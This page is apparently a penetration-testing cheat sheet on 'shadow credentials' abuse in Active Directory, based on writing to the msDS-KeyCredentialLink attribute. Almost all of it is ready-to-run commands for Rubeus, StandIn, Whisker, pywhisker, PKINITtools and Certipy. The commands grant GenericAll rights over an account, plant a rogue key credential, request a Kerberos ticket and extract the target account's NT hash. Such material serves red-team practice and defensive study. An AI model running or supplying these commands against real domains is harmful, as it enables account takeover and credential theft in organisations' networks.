TwitterGitHubBlogSponsor

Key Credentials Abuse

"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, ref)

That makes GenericWrite on a user effectively equal to DCSync right on that user.

Remember that WriteDacl != GenericWrite, so in order to modify msDS-KeyCredentialLink, obtain necessary privileges first. For example, using StandIn:

Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll

DSInternals

Whisker

List all the values of the the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe list /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local

Add a new value to the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe add /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!

Remove a value from the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe remove /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff

Clear all the values of the the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe clear /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local

pywhisker

$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx ~/tools/pywhisker/sqltest_cert.pfx -pfx-pass 3Dc3Er0rst2e9J1yRtjh sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

Certipy

$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]

Last updated